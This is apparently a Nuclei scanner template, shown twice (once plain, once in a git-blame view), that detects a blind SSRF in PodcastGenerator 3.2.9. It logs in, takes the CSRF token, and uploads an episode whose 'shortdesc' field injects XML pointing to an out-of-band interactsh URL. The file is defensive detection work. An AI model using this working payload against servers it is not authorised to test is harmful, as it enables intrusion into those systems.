nuclei-templates/http/vulnerabilities/other/podcast-generator-ssrf.yaml

id: podcast-generator-ssrf

info:
  name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
  author: ritikchaddha,MrHarshvardhan
  severity: high
  description: |
    This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9.
  reference:
    - https://www.exploit-db.com/exploits/51565
    - https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df
    - https://github.com/PodcastGenerator/PodcastGenerator
  metadata:
    verified: true
    max-request: 3
  tags: podcastgenerator,ssrf,authenticated,intrusive
variables:
  string: "{{rand_text_alpha(7)}}"

http:
  - raw:
      - |
        POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA

        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="file"; filename="{{string}}.jpg"
        Content-Type: image/jpeg

        {{rand_text_alpha(50)}}
        {{rand_text_alpha(50)}}

        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="title"

        {{string}}
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="shortdesc"

        test]]></shortdescPG><imgPG path="">http://{{interactsh-url}}</imgPG><shortdescPG><![CDATA[test
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="category[ ]"

        uncategorized
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="date"

        2023-10-30
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="time"

        12:26
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="episodecover"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="longdesc"


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="episodenum"


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="seasonnum"


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="itunesKeywords"


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="explicit"

        no
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="authorname"

        {{string}}
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="authoremail"

        {{string}}@{{string}}.com
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="customtags"


        ------WebKitFormBoundary1WfeHRSBn1aNkQQA
        Content-Disposition: form-data; name="token"

        {{token}}
        ------WebKitFormBoundary1WfeHRSBn1aNkQQA--

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body_2
        words:
          - "Main Information"
          - "Episode Cover:"
        condition: and

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - 'pe="hidden" name="token" value="([A-Za-z0-9]+)">'
        internal: true

# digest: 4a0a004730450221008a5f3b9dd7979252a7a14b8be40494f734292f7e0beecf25b6b94ec3fa209a3d022062f7379a4e29a928ff360fb11e6894ee4aa39399be29c922a1f63b6662551c01:922c64590222798bb761d5b6d8e72950
Create podcast-generator-ssrf.yaml 2023-10-30 12:18:57 +00:00			`id: podcast-generator-ssrf`

			`info:`
			`name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection`
			`author: ritikchaddha,MrHarshvardhan`
			`severity: high`
			`description: \|`
			`This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9.`
			`reference:`
			`- https://www.exploit-db.com/exploits/51565`
			`- https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df`
			`- https://github.com/PodcastGenerator/PodcastGenerator`
			`metadata:`
			`verified: true`
TemplateMan Update [Fri Nov 10 09:15:00 UTC 2023] :robot: 2023-11-10 09:15:01 +00:00			`max-request: 3`
			`tags: podcastgenerator,ssrf,authenticated,intrusive`
Create podcast-generator-ssrf.yaml 2023-10-30 12:18:57 +00:00			`variables:`
			`string: "{{rand_text_alpha(7)}}"`

Update podcast-generator-ssrf.yaml 2023-11-09 20:33:49 +00:00			`http:`
Create podcast-generator-ssrf.yaml 2023-10-30 12:18:57 +00:00			`- raw:`
			`- \|`
			`POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`username={{username}}&password={{password}}`
			`- \|`
			`GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA`

			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="file"; filename="{{string}}.jpg"`
			`Content-Type: image/jpeg`

			`{{rand_text_alpha(50)}}`
			`{{rand_text_alpha(50)}}`

			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="title"`

			`{{string}}`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="shortdesc"`

			`test]]></shortdescPG><imgPG path="">http://{{interactsh-url}}</imgPG><shortdescPG><![CDATA[test`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="category[ ]"`

			`uncategorized`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="date"`

			`2023-10-30`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="time"`

			`12:26`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="episodecover"; filename=""`
			`Content-Type: application/octet-stream`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="longdesc"`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="episodenum"`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="seasonnum"`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="itunesKeywords"`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="explicit"`

			`no`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="authorname"`

			`{{string}}`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="authoremail"`

			`{{string}}@{{string}}.com`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="customtags"`


			`------WebKitFormBoundary1WfeHRSBn1aNkQQA`
			`Content-Disposition: form-data; name="token"`

			`{{token}}`
			`------WebKitFormBoundary1WfeHRSBn1aNkQQA--`

			`host-redirects: true`
			`max-redirects: 2`
TemplateMan Update [Fri Nov 10 09:15:00 UTC 2023] :robot: 2023-11-10 09:15:01 +00:00
Create podcast-generator-ssrf.yaml 2023-10-30 12:18:57 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "dns"`

			`- type: word`
			`part: body_2`
			`words:`
			`- "Main Information"`
			`- "Episode Cover:"`
			`condition: and`

			`extractors:`
			`- type: regex`
			`part: body_2`
			`name: token`
			`group: 1`
			`regex:`
			`- 'pe="hidden" name="token" value="([A-Za-z0-9]+)">'`
			`internal: true`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00
			`# digest: 4a0a004730450221008a5f3b9dd7979252a7a14b8be40494f734292f7e0beecf25b6b94ec3fa209a3d022062f7379a4e29a928ff360fb11e6894ee4aa39399be29c922a1f63b6662551c01:922c64590222798bb761d5b6d8e72950`